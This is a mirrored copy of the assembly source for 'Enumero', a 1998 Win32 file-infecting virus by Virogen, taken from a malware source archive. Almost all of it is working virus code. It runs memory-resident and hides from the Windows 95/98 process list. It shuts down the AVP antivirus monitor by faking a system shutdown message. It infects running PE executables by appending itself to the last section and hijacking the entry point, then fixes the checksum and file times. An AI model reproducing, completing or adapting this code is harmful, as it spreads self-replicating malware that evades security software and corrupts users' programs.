mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
1173 lines
46 KiB
NASM
1173 lines
46 KiB
NASM
;
|
||
; Enumero, (c)1998 by Virogen[NOP]
|
||
; http://virogen.cjb.net
|
||
;
|
||
; This is a fairly simple virus I whipped up REAL fast outta the
|
||
; existing enumiacs source. The only real thing I wanted to accomplish
|
||
; with this virus was full win32 support and demonstration of proper
|
||
; PE infection by appending at the end of the last object's virtual
|
||
; size, not physical size.
|
||
;
|
||
; OS: Win32 (win95/98/NT)
|
||
; Hosts: PE (Parastic - append to last object at obj_rva+obj_vsize
|
||
; No date/time change
|
||
; No attribute change
|
||
; Correct checksum set in header.
|
||
; Physical file size increase varies depending on file alignment
|
||
; and previous padding on last object.
|
||
; Characteristics: Memory resident. Infects PEs when they terminate. Note
|
||
; that the PE must have created a window sometime in
|
||
; its execution, it doesn't matter if this window
|
||
; is visible or not. Process hidden from win95/98
|
||
; process list.
|
||
;
|
||
;
|
||
; greetz: lapse,jp,vecna,darkman, and everyone else
|
||
;
|
||
|
||
include mywin.inc
|
||
|
||
ID_OFF equ 0ch ; offset of our marker in PE
|
||
physical_eip equ 400h ; physical eip
|
||
host_physical_eip equ physical_eip+(offset host_entry-offset vstart) ; physical eip of host entry set
|
||
VIRUS_SIZE equ 6656 ; size after vgalign
|
||
VIRTUAL_SIZE equ 6656
|
||
|
||
; max module/process names we can queue - keep in mind that each
|
||
; is allocated 256 bytes of memory
|
||
max_idx equ 300
|
||
|
||
.386
|
||
locals
|
||
jumps
|
||
.model flat,STDCALL
|
||
;
|
||
; our imported APIs for spawned virus - the spawned virus doesn't have to
|
||
; worry with manual importing nor delta offsets of course.
|
||
;
|
||
extrn ExitProcess:PROC
|
||
extrn EnumWindows:PROC
|
||
extrn SetPriorityClass:PROC
|
||
extrn GetCurrentProcess:PROC
|
||
extrn CloseHandle:PROC
|
||
extrn ReadFile:PROC
|
||
extrn WriteFile:PROC
|
||
extrn SetFilePointer:PROC
|
||
extrn GetModuleHandleA:PROC
|
||
extrn MapViewOfFile:PROC
|
||
extrn CreateFileMappingA:PROC
|
||
extrn UnmapViewOfFile:PROC
|
||
extrn SetEndOfFile:PROC
|
||
extrn SetFilePointer:PROC
|
||
extrn GetFileAttributesA:PROC
|
||
extrn SetFileAttributesA:PROC
|
||
extrn GetFileSize:PROC
|
||
extrn GetTickCount:PROC
|
||
extrn GetFileSize:PROC
|
||
extrn GetFileTime:PROC
|
||
extrn SetFileTime:PROC
|
||
extrn GetProcAddress:PROC
|
||
extrn CheckSumMappedFile:PROC
|
||
extrn PeekMessageA:PROC
|
||
extrn Sleep:PROC
|
||
extrn CopyFileA:PROC
|
||
extrn FindWindowA:PROC
|
||
extrn GetWindowThreadProcessId:PROC
|
||
extrn OpenProcess:PROC
|
||
extrn PostMessageA:PROC
|
||
extrn GetModuleFileNameA:PROC
|
||
extrn LoadLibraryA:PROC
|
||
extrn FreeLibrary:PROC
|
||
extrn IsBadReadPtr:PROC
|
||
|
||
org 0
|
||
.data
|
||
db '<27> [Enumero] by Virogen [NOP] <20>' ; it's i said the fly
|
||
.code
|
||
vstart:
|
||
call geteip ; find relative offset
|
||
geteip:
|
||
mov ebp,[esp] ; grab it off stack
|
||
mov eax,ebp ; used below
|
||
sub ebp,offset geteip ; fix it up
|
||
add esp,4 ; fix da stack
|
||
|
||
; first, let's find kernel base. If this is a parastic portion of virus
|
||
; executing, we'll need to obtain a few APIs in order to spawn the virus.
|
||
; Here we get a pointer to the kernel from the stack (a return address).
|
||
; Then we scan down until we find the kernel base.
|
||
;
|
||
; We encapsulate this with an SEH handler, in case something goes bad wrong
|
||
; we simply immediatly jump to the host (if this is a parastic copy of the
|
||
; virus).
|
||
;
|
||
call set_seh ; setup SEH frame
|
||
;-- error handler
|
||
mov esp,[esp+8]
|
||
pushad
|
||
pushfd
|
||
call geteip3
|
||
geteip3:
|
||
pop ebp
|
||
sub ebp,offset geteip3
|
||
jmp seh_exit
|
||
;-- end error handler
|
||
set_seh:
|
||
push dword ptr fs:[0] ; save old exception ptr
|
||
mov fs:[0],esp ; set ptr to our exception handler
|
||
mov edx,[esp+8] ; determine OS
|
||
|
||
find_base_loop:
|
||
cmp dword ptr [edx+0b4h],edx ; if we're at base, then
|
||
jz good_os ; offset 0b4h contains kernel
|
||
dec edx ; base
|
||
jmp find_base_loop
|
||
|
||
good_os:
|
||
mov [ebp+kernelbase],edx ; save kernel base
|
||
|
||
pushad
|
||
pushfd
|
||
;
|
||
; this is my API importer from lorez, imports APIs from the kernel32.dll
|
||
; export table in memory. Someday I will recode this in a more efficient
|
||
; fashion, but I am too lazy today.
|
||
;
|
||
; a brief explanation of the organization of the export table would be
|
||
; useful here. Ok, basically there are three tables within the export
|
||
; table : API RVA Table (32bit), Name Pointer Table(32bit), and Ordinal
|
||
; Table (16bit). Ok, the ordinal number of an API is the entry number of
|
||
; the API in the RVA array. So, multiply the ordinal number by four and
|
||
; you've got an index into the API RVA Table. Probably you don't already
|
||
; have the ordinal number though, so you'll have to find it. To do this,
|
||
; you use the Name Pointer Table. This is an array of pointers to the
|
||
; asciiz name of each API. When you find the pointer of the API you're
|
||
; looking for by string compares, you take the index number of it and
|
||
; multiply it by 2 (because the ordinal table is 16bit). Index the result
|
||
; in the ordinal table, and you're all set.
|
||
;
|
||
;
|
||
mov esi,edx
|
||
add esi,[esi+3ch] ; relative ptr to PE header
|
||
cmp word ptr [esi],'EP' ; make sure we're on right track
|
||
jnz goto_host ; if not.. abort
|
||
mov esi,[esi+120] ; get export table RVA
|
||
add esi,edx ; relative to image base
|
||
mov edi,[esi+36] ; get ordinal table RVA
|
||
add edi,edx ; relative to image base
|
||
mov [ebp+ordinaltbl],edi ; save it
|
||
mov edi,[esi+32] ; get name ptr RVA
|
||
add edi,edx ; is relative to image base
|
||
mov [ebp+nameptrtbl],edi ; save it
|
||
mov ecx,[esi+24] ; get number of name ptrs
|
||
mov esi,[esi+28] ; get address table RVA
|
||
add esi,edx ; is relative to image base
|
||
mov [ebp+adrtbl],esi ; save it
|
||
|
||
xor edx,edx ; edx is our ordinal counter
|
||
; edi=name ptr table
|
||
; ecx=number of name ptrs
|
||
lea esi,[ebp+APIs] ; -> API Name ptrs
|
||
mov [ebp+ourAPIptr],esi ; save it
|
||
lea eax,[ebp+API_Struct] ; our API address will go here
|
||
mov [ebp+curAPIptr],eax ; save it
|
||
chk_next_API_name:
|
||
mov esi,[ebp+ourAPIptr] ; get ptr to structure item
|
||
mov ebx,[esi] ; load ptr to our API name
|
||
add ebx,ebp ; add relative address
|
||
mov esi,[edi] ; get API name RVA
|
||
add esi,[ebp+kernelbase] ; relative to image base
|
||
compare_API_name:
|
||
lodsb
|
||
cmp al,byte ptr [ebx] ; compare a byte of names
|
||
jnz not_our_API ; it's not our API
|
||
cmp al,0 ; end of string?
|
||
jz is_our_API ; it's our API
|
||
inc ebx
|
||
jmp compare_API_name
|
||
|
||
not_our_API:
|
||
inc edx ; increment API counter
|
||
cmp edx,ecx ; last entry of name ptr table?
|
||
jz goto_host ; uhoh.. we didn't find one
|
||
; of our APIs.. abort it all
|
||
add edi,4 ; increment export name ptr idx
|
||
mov esi,[ebp+ourAPIptr] ; restore our API name ptr struct
|
||
jmp chk_next_API_name
|
||
|
||
is_our_API:
|
||
|
||
mov edi,[ebp+ordinaltbl] ; load oridinal table RVA
|
||
push ecx
|
||
push edx
|
||
xchg edx,eax ; edx=API number
|
||
add eax,eax ; *2 cuz ordinals are words
|
||
add edi,eax ; add to ordinal table VA
|
||
mov ax,[edi] ; get ordinal (word)
|
||
xor edx,edx
|
||
mov ecx,4
|
||
mul ecx ; *4 cuz address tbl is dd's
|
||
mov edi,[ebp+adrtbl] ; load address table VA
|
||
add edi,eax ; set idx to API
|
||
mov eax,edi
|
||
sub eax,[ebp+kernelbase] ; get the VA of the entry
|
||
mov [ebp+originalRVAptr],eax ; save it for kernel infection
|
||
; notice that our last API
|
||
; in the array is the one we
|
||
; hook
|
||
mov eax,[edi] ; get API RVA
|
||
mov [ebp+originalRVA],eax ; save it for kernel infection
|
||
add eax,[ebp+kernelbase] ; is relative to image base
|
||
mov edi,[ebp+curAPIptr] ; idx to storage stucture
|
||
mov [edi],eax ; save VA of API
|
||
add edi,4 ; increment index
|
||
mov [ebp+curAPIptr],edi ; save
|
||
|
||
pop edx
|
||
pop ecx
|
||
|
||
mov edi,[ebp+nameptrtbl] ; reset export name ptr tableidx
|
||
mov esi,[ebp+ourAPIptr] ; restore idx to our name ptrs
|
||
add esi,4 ; increment idx API name ptr structure
|
||
mov [ebp+ourAPIptr],esi ; save our new ptr to name ptr
|
||
cmp dword ptr [esi],0 ; end of our API structure?
|
||
jz found_all ; if so then we got 'em all
|
||
mov edi,[ebp+nameptrtbl] ; reset idx to export name pt
|
||
xor edx,edx ; reset API counter
|
||
jmp chk_next_API_name
|
||
|
||
;
|
||
; now we've imported all our needed APIs to spawn the virus and execute.
|
||
; First we check to see if this is spawned or parastic copy by checking
|
||
; delta offset.
|
||
;
|
||
found_all:
|
||
or ebp,ebp ; spawned file or 1st gen?
|
||
jz spawned_func
|
||
;
|
||
; if parastic copy of virus, then spawn virus and execute it.
|
||
;
|
||
push 275
|
||
push 64 ; allocate memory for spawn
|
||
call [ebp+GlobalAllocAPI] ; path and filename
|
||
or eax,eax
|
||
jz goto_host
|
||
|
||
xor ecx,ecx
|
||
call GetVirusPathFile
|
||
|
||
mov [ebp+spawnfile],eax ; eax->sysdir/spawnfilename buffer
|
||
push eax ; save it fer later
|
||
|
||
push eax
|
||
call [ebp+DeleteFileAPI] ; attempt to delete
|
||
|
||
;
|
||
; now we spawn a copy of the virus. If there is an error creating the
|
||
; spawn file, then that means it is probably shared and therefore already
|
||
; in memory.
|
||
;
|
||
pop esi ; esi->spawn filename
|
||
call Create ; CreateFile
|
||
cmp eax,-1 ; if error, then we're already in mem
|
||
jz dealloc_goto_host
|
||
push eax ; save handle
|
||
mov ecx,VIRUS_SIZE
|
||
mov esi,ebp
|
||
add esi,offset vstart-physical_eip
|
||
call Write ; write our virus
|
||
call [ebp+CloseFileAPI] ; handle still on stack
|
||
|
||
lea eax,[ebp+sinfo] ; overwrite some other unused vars
|
||
push eax
|
||
call [ebp+GetStartupInfoAPI] ; get startup info of process
|
||
|
||
lea eax,[ebp+pinfo] ; storage for process info
|
||
push eax
|
||
lea eax,[ebp+sinfo] ; startup info
|
||
push eax
|
||
push 0
|
||
push 0
|
||
push 67108928h ; CREATE_DEFAULT_ERROR_MODE|IDLE
|
||
push 0
|
||
push 0
|
||
push 0
|
||
push 0
|
||
mov esi,[ebp+spawnfile] ; esi->spawn sysdir/file
|
||
push esi
|
||
call [ebp+CreateProcessAPI] ; create our viral process
|
||
|
||
mov eax,[ebp+hprocess]
|
||
push eax
|
||
call [ebp+CloseHandleAPI] ; close handle of our process
|
||
|
||
dealloc_goto_host:
|
||
mov eax,[ebp+spawnfile]
|
||
push eax
|
||
call [ebp+GlobalFreeAPI]
|
||
goto_host:
|
||
seh_exit:
|
||
|
||
or ebp,ebp ; if spanwed
|
||
jz _exit
|
||
|
||
;
|
||
; Here we calculate the image base, in case this executable was loaded at a base other
|
||
; than the one specified in the PE header.
|
||
;
|
||
|
||
call get_ib_displacement
|
||
get_ib_displacement:
|
||
mov ebx,newep[ebp]
|
||
add ebx,(offset get_ib_displacement-offset vstart)
|
||
pop eax
|
||
sub eax,ebx ; eax=image base
|
||
add host_entry[ebp],eax ; add image base to host entry rva
|
||
|
||
popfd
|
||
popad
|
||
pop dword ptr fs:[0] ; restore original SEH frame
|
||
pop edx ; fixup stack
|
||
|
||
jmp [ebp+host_entry] ; jmp to host entry VA
|
||
host_entry dd offset vstart ; store host entry here
|
||
newep dd 0
|
||
|
||
; spawned virus code - we can throw away delta offsets now. This is
|
||
; the portion of the virus that stays resident.
|
||
;
|
||
spawned_func:
|
||
popfd
|
||
popad
|
||
pop dword ptr fs:[0] ; restore original SEH frame
|
||
pop edx ; fixup stack
|
||
xor ebp,ebp ; no delta offset
|
||
;
|
||
; first call PeekMessage so that the hourglass icon isn't displayed until
|
||
; timeout
|
||
;
|
||
push 0
|
||
push 1
|
||
push 0
|
||
push 0
|
||
push offset msgstruct
|
||
call PeekMessageA
|
||
|
||
;
|
||
; here we try to get the address of RegisterServiceProcess, which will
|
||
; allow us to register as a service process under win95/98, therefore
|
||
; hiding us from the ctrl-alt-del process list. This API not available
|
||
; under WinNT, so we import it manually to make sure that it exists, we
|
||
; don't need any ivalid ordinal numbers on spawned virus loadup.
|
||
;
|
||
; While we're at it, we'll also attempt to import the address of our
|
||
; GetWindowModuleFileNameA from USER32.DLL. If this API doesn't exist,
|
||
; which it is a fairly new API, then we just pass control to the host.
|
||
;
|
||
;
|
||
push offset user32
|
||
call GetModuleHandleA ; get handle of user32.dll
|
||
or eax,eax
|
||
jz _exit ; it should have been loaded
|
||
push offset GetWindowModuleFileName
|
||
push eax
|
||
call GetProcAddress
|
||
or eax,eax ; if we don't have this API, then
|
||
jz _exit ; we must be in old NT or 95 crap
|
||
mov GetWindowModuleFileNameA,eax
|
||
push offset kernel32
|
||
call GetModuleHandleA
|
||
or eax,eax
|
||
jz _exit ; something bad wrong if this
|
||
push offset RegisterService
|
||
push eax
|
||
call GetProcAddress ; get rsp address
|
||
or eax,eax
|
||
jz isNT ; if not found, then NT system
|
||
push 1 ; 1=register process
|
||
push 0 ; null=current process
|
||
call eax ; RegisterServiceProcess
|
||
jmp is9598
|
||
;
|
||
; Under WinNT we'll make use of PSAPI.DLL functionz to retrieve module filenames.
|
||
; We'll grab the address of GetModuleFileNameEx and EnumProcessModules
|
||
;
|
||
|
||
isNT:
|
||
push offset psapi
|
||
call LoadLibraryA
|
||
or eax,eax
|
||
jz is9598
|
||
mov phandle,eax
|
||
push offset EnumPModules
|
||
push eax
|
||
call GetProcAddress
|
||
mov EnumProcessModules,eax
|
||
or eax,eax
|
||
jz unload_psapi
|
||
push offset GetMFileName
|
||
push phandle
|
||
call GetProcAddress
|
||
mov GetModuleFileNameEx,eax
|
||
or eax,eax
|
||
jz unload_psapi
|
||
jmp is9598
|
||
unload_psapi:
|
||
push phandle
|
||
call FreeLibrary
|
||
is9598:
|
||
;
|
||
; get rid of AVP Monitor by simulating a system shutdown, sending WM_ENDSESSION to
|
||
; its window
|
||
;
|
||
;
|
||
push offset avp_wndname ; AVP window name
|
||
push 0 ; class name
|
||
call FindWindowA ; Find AVP
|
||
or eax,eax ; get handle?
|
||
jz no_avp ; if not, then abort
|
||
|
||
push 0 ; no lparam
|
||
push 0 ; or wparam
|
||
push WM_ENDSESSION ; WM_ENDSESSION generated at system shutdown
|
||
push eax ; handle to window
|
||
call PostMessageA ; Post the message
|
||
|
||
no_avp:
|
||
;
|
||
; allocate memory for, and load our virus for later infection
|
||
;
|
||
push 280
|
||
push 64
|
||
call [GlobalAllocAPI] ; allocate memory for del buf
|
||
or eax,eax
|
||
jz _exit
|
||
mov del_buf,eax
|
||
push VIRUS_SIZE
|
||
push 64
|
||
call [GlobalAllocAPI]
|
||
or eax,eax
|
||
jz _exit
|
||
mov virus_mem,eax
|
||
xor ecx,ecx ; return exe filename
|
||
call GetVirusPathFile
|
||
add eax,280
|
||
inc ecx ; ecx!=0 get temp filename
|
||
call GetVirusPathFile
|
||
push eax ; save for below
|
||
push 0
|
||
push eax
|
||
sub eax,280
|
||
push eax
|
||
call CopyFileA
|
||
pop esi ; esi->tmp filename
|
||
call OpenRead
|
||
cmp eax,-1
|
||
jz dealloc_exit
|
||
mov esi,virus_mem
|
||
mov ecx,VIRUS_SIZE
|
||
push eax ; save handle for close
|
||
call Read
|
||
cmp bytesread,VIRUS_SIZE
|
||
jnz dealloc_exit
|
||
call CloseHandle ; handle still on stack
|
||
mov eax,del_buf
|
||
inc ecx ; retrieve temp filename
|
||
call GetVirusPathFile ; get temp filename again
|
||
push eax
|
||
Call [DeleteFileAPI] ; delete temp file
|
||
jmp continue_spawned
|
||
dealloc_exit:
|
||
push del_buf
|
||
call [GlobalFreeAPI]
|
||
push virus_mem
|
||
call [GlobalFreeAPI] ; handle to mem still on stack
|
||
jmp _exit
|
||
;
|
||
; now we need to allocate memory for our array
|
||
;
|
||
continue_spawned:
|
||
push 256*max_idx+1
|
||
push 64 ; GPTR - fixed, zero init
|
||
call [GlobalAllocAPI] ; allocate memory for our array
|
||
or eax,eax ; error allocating? exit
|
||
jz dealloc_exit
|
||
mov pnames,eax
|
||
push 1000h
|
||
push 64 ; allocate memory for modules enumeration
|
||
call [ebp+GlobalAllocAPI] ;
|
||
or eax,eax
|
||
jz dealloc_exit
|
||
mov mod_array,eax
|
||
|
||
call GetCurrentProcess ; get current process handle
|
||
push 64 ; idle priority class
|
||
push eax ; handle of current process
|
||
call SetPriorityClass ; set priority to idle
|
||
|
||
mov testnums,0 ; enumerate and load
|
||
call InstallEnum ; first enumeration
|
||
;
|
||
; This is our memory resident loop. What this does is every 1 second
|
||
; check the number of windows open by re-enumerating them. If this number
|
||
; differs from the last # of open windows, then we go and try to infect
|
||
; all the queued processes, in hopes that one has closed and is suitable
|
||
; for infection. We try to infect the queued processes about 10 times with
|
||
; a quarter second delay between each, or until we at least can open one of
|
||
; the files, this is just in case the window was closed but we still need
|
||
; to give the process time to terminate.
|
||
;
|
||
main_loop:
|
||
push 500 ; 1/2 second sleep
|
||
call Sleep ; suspend process for 1/2 second
|
||
|
||
mov testnums,1 ; just check number of windows
|
||
call InstallEnum ; get number of windows
|
||
mov eax,totalwnd ; get total windows from last en&l
|
||
cmp testednums,eax
|
||
jz main_loop ; if equal keep enumerating
|
||
|
||
mov icnt,0 ; we want to keep trying to infect
|
||
do_i:
|
||
call Infect ; infect if different # of windows open
|
||
cmp re_enum,0
|
||
jnz over_i ; if infected a file, then abort
|
||
push 250 ; 1/4 second
|
||
call Sleep ; suspend process for 1/4 second
|
||
inc icnt ; increment counter
|
||
cmp icnt,10 ; we'll try 10 times
|
||
jnz do_i
|
||
over_i:
|
||
mov testnums,0 ; enumerate and load windows
|
||
call InstallEnum
|
||
jmp main_loop ; we'll want something else here..
|
||
; may eat up too much cpu time
|
||
; some waitforsingleobject variation
|
||
_exit:
|
||
push 0
|
||
call ExitProcess
|
||
;
|
||
; This procedure enumerates the windows using EnumWindows. See
|
||
; EnumWindowsProcedure below, which is called for each window found.
|
||
;
|
||
InstallEnum proc
|
||
cmp testnums,1
|
||
jz jdoit
|
||
mov totalwnd,0
|
||
mov totalexe,0
|
||
mov eax,pnames
|
||
mov curpos,eax
|
||
jdoit:
|
||
mov testednums,0
|
||
push 9090h
|
||
push offset EnumWindowsProc
|
||
call EnumWindows ; set up window enumeration
|
||
ret
|
||
|
||
InstallEnum endp
|
||
|
||
;
|
||
; EnumWindowsProc - this procedure is called for every window found.
|
||
;
|
||
;
|
||
EnumWindowsProc proc uses ebx edi esi, hwnd:DWORD, lparam:DWORD
|
||
cmp testnums,1 ; only testing num of windows?
|
||
jz enum_only ; if so just increment counter
|
||
cmp totalexe,max_idx ; filled our array?
|
||
jge not_exe ; if so just increment counter
|
||
mov eax,GetWindowModuleFileNameA
|
||
or eax,eax
|
||
jz is_old_win
|
||
push 255 ; maximum size of path&filename + null
|
||
push curpos ; pointer to current member of array
|
||
push hwnd ; handle of window
|
||
call eax ; get associated module filename
|
||
or eax,eax ; error - must be NT
|
||
jnz got_fname_ok
|
||
is_old_win:
|
||
; this is NT specific code
|
||
; If we couldn't
|
||
cmp EnumProcessModules,0 ; make sure we got api va
|
||
jz bad_abort
|
||
cmp GetModuleFileNameEx,0 ; make sure we got api va
|
||
jz bad_abort
|
||
push offset pid
|
||
push hwnd
|
||
call GetWindowThreadProcessId ; get process id
|
||
push pid
|
||
push 0
|
||
push PROCESS_ALL_ACCESS
|
||
call OpenProcess ; open da process
|
||
mov phandle,eax
|
||
or eax,eax
|
||
jz bad_abort
|
||
push offset bytesread
|
||
push 1000h
|
||
push mod_array
|
||
push phandle
|
||
call [EnumProcessModules] ; enumerate process modules
|
||
mov esi,mod_array
|
||
getmodloop:
|
||
lodsd
|
||
or eax,eax
|
||
jz abortmodloop
|
||
push 255 ; maximum size of path&filename + null
|
||
push curpos ; pointer to current member of array
|
||
push eax
|
||
push phandle
|
||
call [GetModuleFileNameEx] ; get associated module filename
|
||
call testexe
|
||
jc getmodloop ; if not exe then keep scanning
|
||
abortmodloop:
|
||
push eax
|
||
push phandle
|
||
call CloseHandle
|
||
pop eax
|
||
got_fname_ok:
|
||
call testexe
|
||
jc not_exe ; if not, then don't add to pointer
|
||
add curpos,256 ; increment pointer to next member of array
|
||
inc totalexe ; increment total #s of EXEs found
|
||
not_exe:
|
||
inc totalwnd ; increment total number of window
|
||
bad_abort:
|
||
ret
|
||
enum_only:
|
||
inc testednums
|
||
ret
|
||
EnumWindowsProc endp
|
||
|
||
;
|
||
; here we search the saved process filenames and try to infect each one
|
||
;
|
||
Infect proc
|
||
mov esi,pnames ; pointer to allocated array
|
||
sub esi,256 ; member -1, will make 0 in loop
|
||
mov curidx,-1 ; will increment to 0
|
||
mov re_enum,0 ; if we infected flag
|
||
iloop:
|
||
inc curidx ; increment current member of array
|
||
add esi,256 ; increment index into array
|
||
mov eax,totalexe ; get total EXEs we found in enumer
|
||
cmp curidx,eax ; we exceeded that amount?
|
||
jg abloop ; if so we're done
|
||
push esi ; esi->array member (filename); save
|
||
call OpenFile ; try and open it
|
||
pop esi ; restore ptr to filename
|
||
cmp eax,-1 ; error opening file?
|
||
jz iloop ; if so skip to next member of array
|
||
mov fnameptr,esi ; else save the filename pointer
|
||
push eax ; eax=handle of file
|
||
call CloseHandle ; close the file
|
||
push esi
|
||
call InfectFile ; infect the file
|
||
pop esi
|
||
mov re_enum,1 ; set successful infectin flag
|
||
jmp iloop ; continue trying to infect
|
||
abloop:
|
||
ret
|
||
Infect endp
|
||
|
||
testexe proc
|
||
or eax,eax
|
||
jz return_stc
|
||
mov ecx,eax ; ecx=size of path&filename of module
|
||
add ecx,curpos ; set up pointer to end of path&filename
|
||
sub ecx,3 ; extension starts here
|
||
cmp word ptr [ecx],'XE' ; make sure it's EXE
|
||
jz return_clc
|
||
cmp word ptr [ecx],'xe'
|
||
jz return_clc
|
||
return_stc:
|
||
stc
|
||
ret
|
||
return_clc:
|
||
clc
|
||
ret
|
||
testexe endp
|
||
|
||
; return pointer to virus path and filename
|
||
; entry: eax->buffer
|
||
; ecx=0 if exe file, 1 if tmp file
|
||
; return: eax->buffer
|
||
GetVirusPathFile proc
|
||
|
||
push eax
|
||
push ecx
|
||
push eax
|
||
|
||
push 260 ; max path size
|
||
push eax ; ptr
|
||
call [ebp+GetSysDirAPI] ; get sys directory
|
||
|
||
pop edi ; edi->sys directory
|
||
add edi,eax ; edi->end of dir
|
||
pop ecx
|
||
or ecx,ecx
|
||
jnz tmpname
|
||
lea esi,[ebp+virusname] ; esi->spawn filename
|
||
jmp append
|
||
tmpname:
|
||
lea esi,[ebp+tempname]
|
||
append:
|
||
call copy_str ; append to sys dir
|
||
pop eax
|
||
ret
|
||
|
||
GetVirusPathFile endp
|
||
|
||
|
||
OpenRead:
|
||
mov ecx,3
|
||
mov ebx,80000000h
|
||
jmp or
|
||
Create:
|
||
mov ecx,1
|
||
jmp of
|
||
OpenFile proc
|
||
mov ecx,3
|
||
of:
|
||
mov ebx,0c0000000h
|
||
or:
|
||
push 0
|
||
push 20h ; attribute normal
|
||
push ecx ; 3=open existing file
|
||
push 0
|
||
push 0
|
||
push ebx ; permissions
|
||
push esi
|
||
call [ebp+CreateFileAPI]
|
||
ret
|
||
OpenFile endp
|
||
|
||
Read proc
|
||
push 0
|
||
push offset bytesread
|
||
push ecx
|
||
push esi
|
||
push eax
|
||
call ReadFile
|
||
ret
|
||
Read endp
|
||
|
||
Write proc
|
||
push 0
|
||
lea ebx,[ebp+bytesread]
|
||
push ebx
|
||
push ecx
|
||
push esi
|
||
push eax
|
||
call [ebp+WriteFileAPI]
|
||
ret
|
||
Write endp
|
||
|
||
|
||
;-----------------------------------------------
|
||
; infect file - call with fnameptr set
|
||
;
|
||
; As you can see, we append to the last object at RVA+virtual size
|
||
; and then set physical size to file_align(obj_virtual_size+
|
||
; virus_physical_size). In this way, we take advantage of any padded
|
||
; space in the last object therefore decreasing the physical size
|
||
; increase of the host.
|
||
;
|
||
; It is my contention, that since the virtual size usually represents
|
||
; the true unaligned physical size, appending should always occur
|
||
; at the end of the virtual size and then the physical size should
|
||
; be aligned to the new virtual size.
|
||
;
|
||
;
|
||
InfectFile proc
|
||
|
||
mov eax,fnameptr
|
||
push eax
|
||
call GetFileAttributesA ; get file attributes
|
||
mov oldattrib,eax
|
||
|
||
cmp eax,-1 ; if error then maybe shared
|
||
jnz not_shared
|
||
ret ; can't infect it
|
||
|
||
not_shared:
|
||
push 20h ; +A
|
||
mov eax,fnameptr
|
||
push eax
|
||
call SetFileAttributesA ; clear 'da attribs
|
||
|
||
mov esi,fnameptr
|
||
call OpenFile
|
||
cmp eax,-1
|
||
jnz open_ok
|
||
ret
|
||
open_ok:
|
||
mov handle,eax
|
||
|
||
push offset creation
|
||
push offset lastaccess
|
||
push offset lastwrite
|
||
push eax
|
||
call GetFileTime ; grab the file time
|
||
|
||
xor ecx,ecx ; only map size of file
|
||
call create_mapping ; create file mapping
|
||
jc abort_infect
|
||
; eax->mapped file
|
||
cmp word ptr [eax],'ZM' ; is EXE?
|
||
jnz abort_infect
|
||
|
||
call GetPEHeader ; load esi->PE Header
|
||
|
||
push 2
|
||
push esi ; test ptr for read acces
|
||
call IsBadReadPtr ; was ptr any good?
|
||
or eax,eax
|
||
jnz abort_infect
|
||
|
||
cmp word ptr [esi],'EP' ; PE?
|
||
jnz abort_infect
|
||
|
||
cmp dword ptr [esi+ID_OFF],0 ; any value here?
|
||
jnz abort_infect ; if yes, infected
|
||
|
||
call unmap ; unmap file
|
||
|
||
mov ecx,VIRUS_SIZE+1000h ; add max virus size to map size
|
||
call create_mapping ; map file again
|
||
jc abort_infect
|
||
|
||
call GetPEHeader ; load esi -> pe header
|
||
|
||
call GetTickCount ; get tick count
|
||
mov dword ptr [esi+ID_OFF],eax ; save as infect flag
|
||
|
||
xor eax,eax
|
||
mov ax, word ptr [esi+NtHeaderSize] ; get header size
|
||
add eax,18h ; object table is here
|
||
|
||
mov edi,esi
|
||
add edi,eax ; edi->object table
|
||
xor eax,eax
|
||
mov ax,[esi+numObj] ; get number of objects
|
||
dec eax ; we want last object
|
||
mov ecx,40 ; each object 40 bytes
|
||
xor edx,edx
|
||
mul ecx ; numObj-1*40=last object
|
||
add edi,eax ; edi->last obj
|
||
|
||
mov eax,[edi+objpoff] ; get last object physical off
|
||
mov lastobjimageoff,eax ; save it
|
||
|
||
mov ecx,[edi+objpsize] ; get physical size of object
|
||
mov eax,[edi+objvsize] ; get object virtual size
|
||
push eax ; save virtual size
|
||
push ecx ; save original p size
|
||
mov originalvsize,eax ; save it 4 later
|
||
add eax,VIRTUAL_SIZE ; add our virtual size
|
||
mov dword ptr [edi+objvsize],eax ; save new virtual size
|
||
mov ecx,[esi+filealign] ; physical size=filealign(vsize)
|
||
call align_fix ; align new vsize to be psize
|
||
mov [edi+objpsize],eax ; save new physical size
|
||
mov newpsize,eax ; store it for exe size calc
|
||
push eax
|
||
|
||
mov ecx,dword ptr [esi+objalign] ; get object alignment
|
||
mov eax,dword ptr [edi+objvsize] ; add virtual size
|
||
add eax,dword ptr [edi+objrva] ; +last object rva
|
||
call align_fix ; set on obj alignment
|
||
mov dword ptr [esi+imagesize],eax ; save new imagesize
|
||
|
||
mov [edi+objflags],0E0000060h ; set object flags r/w/x
|
||
|
||
pop ecx ; restore new phsyical size
|
||
pop eax ; original psize
|
||
sub ecx,eax
|
||
mov diffpsize,ecx
|
||
|
||
pop eax ; restore orginal virtual size
|
||
add eax,[edi+objrva] ; add last object's RVA
|
||
; eax now RVA of virus code
|
||
add eax,physical_eip ; add physical eip:
|
||
mov ebx,[esi+entrypointRVA] ; get original entry
|
||
mov [esi+entrypointRVA],eax ; put our RVA as entry
|
||
|
||
mov ecx,[ebp+virus_mem]
|
||
add ecx,host_physical_eip
|
||
mov [ecx],ebx ; save host e RVA
|
||
add ecx,4
|
||
mov [ecx],eax ; save virus e RVA
|
||
;
|
||
push esi
|
||
|
||
mov edi,map_ptr
|
||
add edi,originalvsize ; restore original virtual size
|
||
add edi,lastobjimageoff ; add object physical offset
|
||
; edi->physical end of object
|
||
mov esi,virus_mem ; esi->virus
|
||
mov ecx,VIRUS_SIZE
|
||
rep movsb ; copy virus to host
|
||
|
||
pop esi
|
||
mov ecx,lastobjimageoff
|
||
add ecx,newpsize
|
||
mov fsize,ecx ; store new filesize
|
||
push ecx ; ecx=real file size
|
||
|
||
call unmap ; unmap file
|
||
|
||
pop ecx
|
||
push FILE_BEGIN ; from file begin
|
||
push 0 ; distance high
|
||
push ecx ; distance low
|
||
push handle
|
||
call SetFilePointer ; move file pointer to
|
||
; real EOF
|
||
push handle
|
||
call SetEndOfFile ; set end of file
|
||
;
|
||
; now we need to calculate checksum. We need to remap the file to get it
|
||
; right after file size change. I might be wrong about this, there could
|
||
; have been a bug in my code, but it seems resonable.
|
||
;
|
||
xor ecx,ecx
|
||
call create_mapping
|
||
jc unmapped
|
||
mov esi,[eax+3ch]
|
||
add esi,eax ; esi->pe header
|
||
lea eax,[esi+checksum]
|
||
push eax ; destination of checksum in hdr
|
||
push offset oldchksum
|
||
push fsize ; new file size
|
||
mov eax,map_ptr
|
||
push eax
|
||
call CheckSumMappedFile
|
||
call unmap
|
||
|
||
jmp unmapped
|
||
|
||
